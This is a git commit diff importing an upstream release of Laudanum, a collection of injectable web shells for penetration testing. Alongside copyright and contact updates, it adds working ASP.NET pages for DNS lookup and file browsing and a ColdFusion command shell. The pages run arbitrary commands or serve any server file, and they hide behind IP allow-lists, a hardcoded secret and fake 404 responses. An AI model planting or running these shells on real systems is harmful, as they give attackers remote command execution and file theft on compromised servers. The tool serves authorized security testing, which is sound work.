Commit 517db76e authored by Devon Kearns's avatar Devon Kearns

Imported Upstream version 1.0

parent 16202b4c
File deleted
......@@ -2,16 +2,14 @@ The Team
========================================================
- Kevin Johnson
- Project Lead
- Justin Searle
- Core Developer
- Tim Medin
- Core Developer
- Project Lead
- James Jardine
- Core Developer
- Justin Searle
- Core Developer
Additional Coding
========================================================
- Robin Wood
- Jason Gillam (Wordpress Plugin)
\ No newline at end of file
Laudanum: Injectable Web Exploit Code v0.4
Laudanum: Injectable Web Exploit Code v0.8
By Kevin Johnson <kjohnson@secureideas.net>
and the Laudanum Development Team
......@@ -9,7 +9,7 @@ Sourceforge Site: http://sourceforge.net/projects/laudanum
SVN : svn co https://laudanum.svn.sourceforge.net/svnroot/laudanum laudanum
-------------------------------------------------------------------------------
** Copyright (C) 2012 Kevin Johnson and the Laudanum Project Team
** Copyright (C) 2014 Kevin Johnson and the Laudanum Project Team
**
** This program is free software; you can redistribute it and/or modify
** it under the terms of the GNU General Public License as published by
......
......@@ -10,14 +10,14 @@
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' *** Tim Medin <tim@counterhack.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** This file provides access to DNS on the system.
' *** Written by Tim Medin <timmedin@gmail.com>
' *** Written by Tim Medin <tim@counterhack.com>
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
......@@ -143,7 +143,7 @@ end if
%>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
......
......@@ -13,14 +13,14 @@
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' *** Tim Medin <tim@counterhack.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** This file provides access to the file system.
' *** Written by Tim Medin <timmedin@gmail.com>
' *** Written by Tim Medin <tim@counterhack.com>
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
......@@ -170,7 +170,7 @@ next
</table>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
......
......@@ -13,14 +13,14 @@
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' *** Tim Medin <tim@counterhack.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** This file provides access as a proxy.
' *** Written by Tim Medin <timmedin@gmail.com>
' *** Written by Tim Medin <tim@counterhack.com>
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
......@@ -74,7 +74,7 @@ function err_handler()
<%=Err.Message%><br/>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
......@@ -341,7 +341,7 @@ if len(FullUrl) = 0 then
</form>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
......
......@@ -10,14 +10,14 @@
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' *** Tim Medin <tim@counterhack.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** Updated and fixed by Robin Wood <Digininja>
' *** Updated and fixed by Tim Medin <tim@securitywhole.com
' *** Updated and fixed by Tim Medin <tim@counterhack.com
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
......@@ -75,7 +75,7 @@ Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
</form>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
......
<%@ Page Language="C#"%>
<%@ Import Namespace="System" %>
<html><head><title>Laudanum - DNS</title></head><body>
<script runat="server">
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.com
*** laudanum@secureideas.com
***
*** Project Leads:
*** Kevin Johnson <kevin@secureideas.com>
***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file provides shell access to DNS on the system.
*** Written by James Jardine <james@secureideas.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
// ********************* Config entries below ***********************************
// IPs are enterable as individual addresses
string[] allowedIPs = new string[3] { "::1", "192.168.1.1", "127.0.0.1" };
// ***************** No editable content below this line **************************
string stdout = "";
string stderr = "";
string[] qtypes = "Any,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV".Split(',');
void die() {
//HttpContext.Current.Response.Clear();
HttpContext.Current.Response.StatusCode = 404;
HttpContext.Current.Response.StatusDescription = "Not Found";
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
HttpContext.Current.Server.ClearError();
HttpContext.Current.Response.End();
}
void Page_Load(object sender, System.EventArgs e) {
// check if the X-Fordarded-For header exits
string remoteIp;
if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
remoteIp = Request.UserHostAddress;
} else {
remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0];
}
bool validIp = false;
foreach (string ip in allowedIPs) {
validIp = (validIp || (remoteIp == ip));
}
if (!validIp) {
die();
}
string qType = "Any";
bool validType = false;
if (Request.Form["type"] != null)
{
qType = Request.Form["type"].ToString();
foreach (string s in qtypes)
{
if (s == qType)
{
validType = true;
break;
}
}
if (!validType)
qType = "Any";
}
if (Request.Form["query"] != null)
{
string query = Request.Form["query"].Replace(" ", string.Empty).Replace(" ", string.Empty);
if(query.Length > 0)
{
System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("nslookup", "-type=" + qType + " " + query);
// The following commands are needed to redirect the standard output and standard error.
procStartInfo.RedirectStandardOutput = true;
procStartInfo.RedirectStandardError = true;
procStartInfo.UseShellExecute = false;
// Do not create the black window.
procStartInfo.CreateNoWindow = true;
// Now we create a process, assign its ProcessStartInfo and start it
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo = procStartInfo;
p.Start();
// Get the output and error into a string
stdout = p.StandardOutput.ReadToEnd();
stderr = p.StandardError.ReadToEnd();
}
}
}
</script>
<form method="post">
QUERY: <input type="text" name="query"/><br />
Type: <select name="type">
<%
foreach (string s in qtypes)
{
Response.Write("<option value=\"" + s + "\">" + s + "</option>");
}
%>
</select>
<input type="submit"><br/>
STDOUT:<br/>
<pre><% = stdout.Replace("<", "&lt;") %></pre>
<br/>
<br/>
<br/>
STDERR:<br/>
<pre><% = stderr.Replace("<", "&lt;") %></pre>
</body>
</html>
<%@ Page Language="C#"%>
<%@ Import Namespace="System" %>
<html><head><title>Laudanum - File</title></head><body>
<script runat="server">
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.com
*** laudanum@secureideas.com
***
*** Project Leads:
*** Kevin Johnson <kevin@secureideas.com>
***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file allows browsing of the file system
*** Written by James Jardine <james@secureideas.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
********************************************************************************* */
// ********************* Config entries below ***********************************
// IPs are enterable as individual addresses
string[] allowedIPs = new string[3] {"::1", "192.168.1.1","127.0.0.1"};
// ***************** No editable content below this line **************************
bool allowed = false;
string dir = "";
string file = "";
void Page_Load(object sender, System.EventArgs e)
{
foreach (string ip in allowedIPs)
{
if (HttpContext.Current.Request.ServerVariables["REMOTE_ADDR"] == ip)
{
allowed = true;
}
}
if (!allowed)
{
die();
}
//dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Environment.SystemDirectory;
dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Server.MapPath(".");
file = Request.QueryString["file"] != null ? Request.QueryString["file"] : "";
if (file.Length > 0)
{
if (System.IO.File.Exists(file))
{
writefile();
}
}
}
void writefile()
{
Response.ClearContent();
Response.Clear();
Response.ContentType = "text/plain";
//Uncomment the next line if you would prefer to download the file vs display it.
//Response.AddHeader("Content-Disposition", "attachment; filename=" + file + ";");
Response.TransmitFile(file);
Response.Flush();
Response.End();
}
void die() {
//HttpContext.Current.Response.Clear();
HttpContext.Current.Response.StatusCode = 404;
HttpContext.Current.Response.StatusDescription = "Not Found";
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
HttpContext.Current.Server.ClearError();
HttpContext.Current.Response.End();
}
</script>
<html>
<head></head>
<% string[] breadcrumbs = dir.Split('\\');
string breadcrumb = "";
foreach (string b in breadcrumbs)
{
if (b.Length > 0)
{
breadcrumb += b + "\\";
Response.Write("<a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(breadcrumb) + "\">" + Server.HtmlEncode(b) + "</a>");
Response.Write(" / ");
}
}
%>
<table>
<tr><th>Name</th><th>Date</th><th>Size</th></tr>
<%
try
{
if (System.IO.Directory.Exists(dir))
{
string[] folders = System.IO.Directory.GetDirectories(dir);
foreach (string folder in folders)
{
Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(folder) + "\">" + Server.HtmlEncode(folder) + "</a></td><td></td><td></td></tr>");
}
}
else
{
Response.Write("This directory doesn't exist: " + Server.HtmlEncode(dir));
Response.End();
}
}
catch (System.UnauthorizedAccessException ex)
{
Response.Write("You Don't Have Access to this directory: " + Server.HtmlEncode(dir));
Response.End();
}
%>
<%
System.IO.DirectoryInfo di = new System.IO.DirectoryInfo(dir);
System.IO.FileInfo[] files = di.GetFiles();
foreach (System.IO.FileInfo f in files)
{
Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(dir) + "&file=" + Server.UrlEncode(f.FullName) + "\">" + Server.HtmlEncode(f.Name) + "</a></td><td>" + f.CreationTime.ToString() + "</td><td>" + f.Length.ToString() + "</td></tr>");
}
%>
</table>
</body>
</html>
\ No newline at end of file
......@@ -14,9 +14,9 @@
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@securitywhole.com>
*** Tim Medin <tim@counterhack.com>
***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
......@@ -120,10 +120,10 @@ STDERR:<br/>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>
\ No newline at end of file
</html>
<cfapplication scriptProtect="none">
<!---
/* *****************************************************************************
***
......@@ -13,17 +14,15 @@
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@securitywhole.com>
***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file provides access to shell acces on the system.
*** Modified by Tim Medin
***
********************************************************************************
***
*** TODO: Fix the problem with quotes
*** Add authentication
*** Modified by Matt Presson <@matt_presson>
*** - Added some basic authentication via HTTP header
*** - Resolved cfexecute stripping quotes
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
......@@ -43,38 +42,58 @@
***
***************************************************************************** */
--->
<cfif #cgi.remote_addr# neq "1.1.1.1">
<cfset secretCode = "a208bddb1f68aa8a8641b65d93979740c82fb387" /> <!--- Set this to something unique like a randomly generated SHA1 Hash --->
<cfset QuoteMark = "'" />
<cfset DoubleQuoteMark = """" />
<!--- Authentication: Check for the GUID in either a custom header or POSTed by the form --->
<cfset suppliedCode = "" />
<cfif structKeyExists(GetHttpRequestData().headers, "X-Auth-Code")>
<cfset suppliedCode = "#StructFind(GetHttpRequestData().headers, "X-Auth-Code")#" />
<cfelseif structKeyExists(FORM, "authCode")>
<cfset suppliedCode = "#StructFind(FORM, "authCode")#" />
</cfif>
<cfif ( #suppliedCode# neq secretCode )>
<cfheader statuscode="404" statustext="Page Not Found" />
<cfabort />
</cfif>
<html>
<head><title>Laudanum Coldfusion Shell</title></head>
<body>
<form action="shell.cfm" method="POST">
<cfif IsDefined("form.cmd")>
Executable: <Input type="text" name="cmd" value="<cfoutput>#HTMLEditFormat(form.cmd)#</cfoutput>"> For Windows use: cmd.exe or the full path to cmd.exe<br>
Arguments: <Input type="text" name="arguments" value="<cfoutput>#HTMLEditFormat(form.arguments)#</cfoutput>"> For Windows use: /c <i>command</i><br>
<cfelse>
Executable: <Input type="text" name="cmd" value="cmd.exe"><br>
Arguments: <Input type="text" name="arguments" value="/c "><br>
</cfif>
<input type="submit">
</form>
<head><title>Laudanum Coldfusion Shell</title></head>
<body>
<form action="<cfoutput>#cgi.script_name#</cfoutput>" method="POST">
<cfif IsDefined("form.cmd")>
Executable: <Input type="text" name="cmd" value="<cfoutput>#HTMLEditFormat(form.cmd)#</cfoutput>"> For Windows use: cmd.exe or the full path to cmd.exe<br>
Arguments: <Input type="text" name="arguments" value="<cfoutput>#HTMLEditFormat(form.arguments)#</cfoutput>"> For Windows use: /c <i>command</i><br>
<cfelse>
Executable: <Input type="text" name="cmd" value="cmd.exe"><br>
Arguments: <Input type="text" name="arguments" value="/c "><br>
</cfif>
<input type="hidden" name="authCode" value="<cfoutput>#HTMLEditFormat(suppliedCode)#</cfoutput>">
<input type="submit">
</form>
<!--- Updated the call to cfexecute so use an array instead of a string. This way quotes are not stripped. --->
<cfif IsDefined("form.cmd")>
<pre>
<cfexecute name="#Replace(preservesinglequotes(form.cmd), QuoteMark, DoubleQuoteMark, 'All')#" arguments="#Replace(preservesinglequotes(form.arguments), QuoteMark, DoubleQuoteMark, 'All')#" timeout="5" variable="foo"></cfexecute>
<cfoutput>#Replace(foo, "<", "&lt;", "All")#</cfoutput>
</pre>
<cfset argumentsArray = #listToArray(form.arguments, " ")# />
<pre>
<cfexecute name="#Replace(preservesinglequotes(form.cmd), QuoteMark, DoubleQuoteMark, 'All')#" arguments="#argumentsArray#" timeout="5" variable="foo"></cfexecute>
<cfoutput>#Replace(foo, "<", "&lt;", "All")#</cfoutput>
</pre>
</cfif>
Note: The cold fusion command that executes shell commands strips quotes, both double and single, so be aware.
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
Note: The cold fusion command that executes shell commands strips quotes, both double and single, so be aware.
<hr/>
<address>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Bug fixes by Matt Presson<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>
......@@ -34,7 +34,7 @@ disr = dis.readLine();
</pre>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
......
......@@ -10,14 +10,14 @@
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@securitywhole.com>
*** Tim Medin <tim@counterhack.com>
***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file provides access to DNS on the system.
*** Written by Tim Medin <tim@securitywhole.com>
*** Written by Tim Medin <tim@counterhack.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
......@@ -79,7 +79,7 @@ function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
<hr>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
......@@ -152,7 +152,7 @@ if ($query != '')
?>
<hr>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
......
......@@ -10,14 +10,15 @@
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@securitywhole.com>
*** Tim Medin <tim@counterhack.com>
***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file allows browsing of the file system.
*** Written by Tim Medin <tim@securitywhole.com>
*** Written by Tim Medin <tim@counterhack.com>
*** 2013-12-28 Updated by Jason Gillam - fixed parent folder
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
......@@ -79,7 +80,7 @@ function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
<hr>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
......@@ -150,7 +151,7 @@ for ($i = 0; $i < count($dirs) - 2; $i++) {
echo "<table>";
echo "<tr><th>Name</th><th>Date</th><th>Size</th></tr>";
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?dir=$parentdir\">../</a></td><td> </td><td> </td></tr>";
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?dir=" . $parentdir . "\">../</a></td><td> </td><td> </td></tr>";
//get listing, separate into directories and files
$listingfiles = array();
......@@ -187,7 +188,7 @@ else {
</table>
<hr>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
......
<?php
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file provides a host lookup by ip address.
*** Adapted from Laudanum dns.php by Jason Gillam <jgillam@secureideas.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.